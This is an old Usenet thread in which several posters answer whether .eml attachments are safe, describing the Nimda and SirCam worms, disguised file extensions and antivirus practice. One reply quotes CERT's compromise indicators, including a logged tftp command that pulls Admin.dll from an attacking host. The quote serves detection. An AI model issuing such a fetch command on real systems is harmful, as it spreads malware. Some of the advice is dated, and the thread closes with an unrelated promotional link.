OT: Are .eml files safe to open?
Bob Chilcoat
and what it is. Recently I've been getting a number of .eml files as
attachments, usually attached to e-mails forwarded to me by someone I know.
I also understand that .jpg files that don't open automatically are usually
safe to open since they are interpreted, not executables (is this true?).
Today I got a .eml file that was 570 kbytes long attached to a message. I
assumed that it would contain a binary picture and, since it was from
someone I know and was the subject of the e-mail, I opened it. Instead of a
picture, it turned out to be a simple html message two paragraphs long.
What was the rest of the file? A virus? I have an up-to-date Norton
Antivirus installed, and it has caught a lot of potential trouble, but it
did not alarm on this.
I would appreciate some advice on what attachments are safe to open.
--
Bob
----------
HECTOP
> I don't normally open any .exe file that I get, unless I know who sent it
> and what it is. Recently I've been getting a number of .eml files as
.eml are usually just plain ASCII text files containing e-mail messages complete
with headers usually non-transparent to users, but still they can possibly
(like any other e-mail) contain malicious VBscripts and what not. Your best bet
is to have an anti-virus (with current virus definitions database) check that file,
and/or open that file with a basic text-editor like "notepad" or "wordpad" for example,
something that's not capable of executing any scripts. And as always exercise caution
with any attachments both from known and unknown senders (known sender's machine could
be infected and automatically replicating viruses to anyone in that sender's adressbook).
One way or another, invest in an anti-virus program that's capable of filtering all
incoming mail for you, Norton Antivirus is one of the most popular choices e.g.
See: http://www.symantec.com/nav/nav_9xnt/
--
--
HECTOP
PP-ASEL-IA
http://www.maxho.com
maxho_at_maxho.com
Arthur Cinader Jr.
a .eml file is simply an email file. If it is in your inbox or attached to
another .eml file does not change its ability to infect you. If you read
email that you get, you are not opening yourself up to any incremental risk
by reading email attached to other email.
Best,
Arthur
"Bob Chilcoat" <view...@erolsREMOVE.com> wrote in message
news:9ovcd4$av1$1...@bob.news.rcn.net...
Paul Tomblin
>Today I got a .eml file that was 570 kbytes long attached to a message. I
>assumed that it would contain a binary picture and, since it was from
>someone I know and was the subject of the e-mail, I opened it. Instead of a
>picture, it turned out to be a simple html message two paragraphs long.
>What was the rest of the file? A virus? I have an up-to-date Norton
>Antivirus installed, and it has caught a lot of potential trouble, but it
>did not alarm on this.
Congratulations, you are now infected with the Nimda worm. Right now,
without you knowing it, your machine is busily scanning random IP
addresses and looking to propogate itself by either exploiting one of the
thousands of security holes in Microsoft's IIS web server (which Microsoft
"helpfully" installs on your system without telling you), by opening up
and exploiting hidden file shares, or by attempting to create a TFTP
session and shipping itself over to other computers that way. It will
also attach this readme.eml copy of itself onto every email you send, and
onto every web page your Personal Web Server serves up.
It's no wonder the Gartner Group is recommending that everybody who cares
about security dumps IIS immediately. I'm just amazed that they didn't
say the same thing about IE and Outlook.
--
Paul Tomblin <ptom...@xcski.com>, not speaking for anybody
"I'm cruising down the Information Superhighway in high gear, surfing the
waves of the Digital Ocean, exploring the uncharted regions of Cyberspace.
Actually I'm sitting on my butt staring at a computer screen."
al...@mindhelicalwire.com
>since it was from
>someone I know and was the subject of the e-mail, I opened it.
Bob, watch out for this assumption!!!
I just got an email from my son, with an attached file that he and I
had worked on together a while ago, and a request that I review it. I
didn't notice that it had a different extension (.pif), and opened it,
thus infecting my computer as well. It opened in excel, just like the
original file had. When his question was not obvious to me, I called
him and got an "Oh, shit, I think I've been hit with a virus!" And now
I had it too. In this case it was SirCam, and it cleaned up nicely
with a tool from Norton's web site. And I went off line as soon as we
suspected a virus, so I don't thin I infected anyone else.
But the moral is, don't count on knowledge of the sender, or even
knowledge of the attached file to keep you safe, since the email might
have been sent by a virus on your acquaintance's computer.
--
Alex
Make the obvious change in the return address to reply by email.
Bob May
others of lesser types like special ones for some particular CAD or other
such type program.
The theory here is that any extension which will be able to contain a
segment of code for any program (like a Word or Office document) can provide
a way for a virus to infect a computer. I don't even like seeing HTML code
in a email as it's also a way to the hard disk through ActiveX controls and
to a slightly lesser degree the scripting controls that are available to the
virus writer.
I also note that others have written about microsoft's security holes in
their software. Microsoft is the largest pusher of the desire to write to
your hard disk in various ways and, at some point, that will eventually be
their downfall when somebody does a good virus that takes out a large
porportion of the computers that are running windoz.
--
Bob May
Imagine the terrorist's fun when they realize that a "nubile virgin" is a 3
month old girl!
Robert
I haven't had any real problems to speak of, but just in case, I'm getting
on Microsoft's web page and
updating my security... for what it's worth.
thanks for the heads up
Robert
Marty Escarcega <esca...@home.com> wrote in message
news:20010928002312.CYIV16745.femail46.sdc1.sfba.home.com@cx149251-a...
> Dunno how true it is...but....
> Marty
>
> Found this <9ovio9$igm$1...@allhats.xcski.com> in rec.crafts.metalworking:
>
> == BEGIN forwarded message ==
> == END forwarded message ==
>
>
Thomas Mosher
At work our firewall went down and, of course, guess what snuck in
immediately after - NIMDA. The .eml files propogated to the point that
multiple computer hard-drives were choaked with them.
Ask me - my machine was one of the ones that was screwed beyond belief.
Tom
"Bob Chilcoat" <view...@erolsREMOVE.com> wrote in message
news:9ovcd4$av1$1...@bob.news.rcn.net...
DoN. Nichols
Bob Chilcoat <view...@erolsREMOVE.com> wrote:
>I don't normally open any .exe file that I get, unless I know who sent it
>and what it is. Recently I've been getting a number of .eml files as
>attachments, usually attached to e-mails forwarded to me by someone I know.
>I also understand that .jpg files that don't open automatically are usually
>safe to open since they are interpreted, not executables (is this true?).
Well ... for the moment -- until MicroSoft comes up with some
way to put executable code in the .jpg. As long as you are *sure* that
it is a .jpg. Do you still have the default setting in your computer to
"hide known extensions"? If so, you could receive a file named
"grandson.jpg.exe", and it would show as "grandson,jpg". Therefore you
might *think that it is safe to open, but it is not in reality. (This
switch is somewhere in the sub-menus under "My Computer", I think, and
also (on some versions of Windows) has a button "Make others like this"
(or something similar) to cause the selection to take effect on all
directories and disks.
>Today I got a .eml file that was 570 kbytes long attached to a message. I
>assumed that it would contain a binary picture and, since it was from
>someone I know and was the subject of the e-mail, I opened it.
Don't! Not until you've verified that he *did* intentionally
send it to you, and can tell you why. (Most of) the current viri use
the name of the latest victim, and mail to people in his address files,
so the e-mail will appear to come from someone with whom you exchange
e-mail. One of them (SirCam) grabs a random file out of the "My
Documents" directory, sticks the virus in front of it, and
> Instead of a
>picture, it turned out to be a simple html message two paragraphs long.
>What was the rest of the file? A virus? I have an up-to-date Norton
>Antivirus installed, and it has caught a lot of potential trouble, but it
>did not alarm on this.
How up to date is "up to date"? The general advice now is to
update virus scanner tables daily, not weekly.
>I would appreciate some advice on what attachments are safe to open.
If you want my honest opinion -- with a Windows system, *none*.
Those which are safe today will probably not be so tomorrow.
Now -- MicroSoft has this nasty little habit of creating more
and more extensions, and re-inventing more and more existing standards
in an incompatable way. You used to be able to just forward an e-mail
with no problems. The system took care of the headers and made it all
work properly.
Now -- Microsoft has to create a new attachment for forwarding
e-mail. This is transparent to their programs, but does not work
properly with other programs. Some vendors try to play catchup, opening
similar security holes in their programs.
I stick with unix, with an e-mail program which I can download
in source code form, modify as I wish, compile and install. So I can
make it do what *I* want. It does not attempt to automatically run
attachments. It waits for me to tell it to extract the attachment, and
to tell it where I want to put that attachement. (None of this "put it
in a directory buried somewhere which only the e-mail program knows.)
It also allows me to see the full name, and to edit that name before
saving the file.
Now, a .exe, a .dll, a .scr, or any of the growing number of
other files can be safely saved on a system which has no mechanism to
execute them. I can dig around in the attachments and find out what
virus it is, and what files from the victim's system it has sent out.
(Some very interesting ones from time to time. :-)
So -- *don't* use Outlook Express for an e-mail program. Don't
use a web browser for an e-mail program. (That is vulnerable to some
nasty tricks in HTML -- and the spammers are *using* those nasty tricks.
I see examples frequently.)
Get some third-party program -- Forte Agent, or perhaps Eduora.
Install it, and go through it to turn off any automatic extraction of
attachments, and most of all -- be suspicious of *any* attachment, even
from known friends.
Or -- even better, get some flavor of linux or BSD and use
*that* for handling e-mail. At the moement, they are targeting the
easier target -- Windows.
Now -- if you have Nimda (as was suggested, and as is very
likely), be aware that the CERT advisory about it suggests that the only
way to truly clean the system is to re-format *all* of the hard disks,
and re-install everything from safe media (e.g. the distribution CDs).
Symantec (last I looked at their page on Nimda) seems to feel that they
can clean most of it up, but even they are not sure that they can
restore the system to its proper configuration (e.g. no shares open
which should not be, no backdoors installed, etc.) They *might* have
gotten better at it now, or might not.
Good Luck,
DoN.
--
Email: <dnic...@d-and-d.com> | Voice (all times): (703) 938-4564
(too) near Washington D.C. | http://www.d-and-d.com/dnichols/DoN.html
--- Black Holes are where God is dividing by zero ---
Bob Chilcoat
Given the very positive statements the I now must HAVE the Nimda worm, I
went back to Norton and downloaded the latest updates (only a few days since
the last time), and then scanned all my disks. This was what Norton
recommended as a "manual" method of cleaning the worm out. NAV found
NOTHING (no viruses of any kind) on any of two hard disks. (I did have NAV
configured for "scan all files".)
OK, is there a way to find out if I have an occult infection that didn't
show up in the scan? Thanks.
For that matter, is there any quick test or file to examine just to see if
NIMDA is present?
--
Bob
----------
"DoN. Nichols" <dnic...@d-and-d.com> wrote in message
news:9p0sgk$59d$1...@izalco.d-and-d.com...
Ed Huntress
>
> OK, is there a way to find out if I have an occult infection that didn't
> show up in the scan? Thanks.
Here's the recommendation from CERT:
=================================
To determine if your system has been compromised, look for the following:
* a root.exe file (indicates a compromise by Code Red II or sadmind/IIS
worms making the system vulnerable to the Nimda worm)
* an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the
file name Admin.dll may be legitimately installed by IIS in other
directories.)
* unexpected .eml or .nws files in numerous directories
* the presence of this string:
/c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 in the IIS logs,
where "x.x.x.x" is the IP address of the attacking system. (Note that only
the "200" result code indicates success of this command.)
================================
For further info, go to: http://www.cert.org/advisories/CA-2001-26.html
Ed Huntress
Neal Howard
website that said 'MS is contributing to Global Worming '. I thought that was a
pretty good pun.
bit-b...@maney.org
In rec.aviation.piloting Thomas Mosher <tmo...@gbronline.com> wrote:
[...]
: At work our firewall went down and, of course, guess what snuck in
: immediately after - NIMDA.
Hate to say it, but this is a design flaw in your network. If your
firewall is down, then your connection to the Net should be down
as well. Anything else leaves you exposed (as you have already
found out).
: The .eml files propogated to the point that multiple computer
: hard-drives were choaked with them.
: Ask me - my machine was one of the ones that was screwed beyond belief.
That's the problem with running insecure machines on insecure networks
(which will become the only type of machine/network if the congress
has their way with regards to strong encryption) they have holes in
them that get exploited.
fpsm
--
| Fredrich P. Maney maney at maney dot org |
| Do NOT send me HTML formatted E-mail or copies of netnews posts! |
| Address in header is a spamtrap. Use one in signature for replies. |
| Please review http://www.maney.org/fred/site/uce/ before emailing. |
Sophia Smith
To Convert- https://www.mailsware.com/eml-converter.html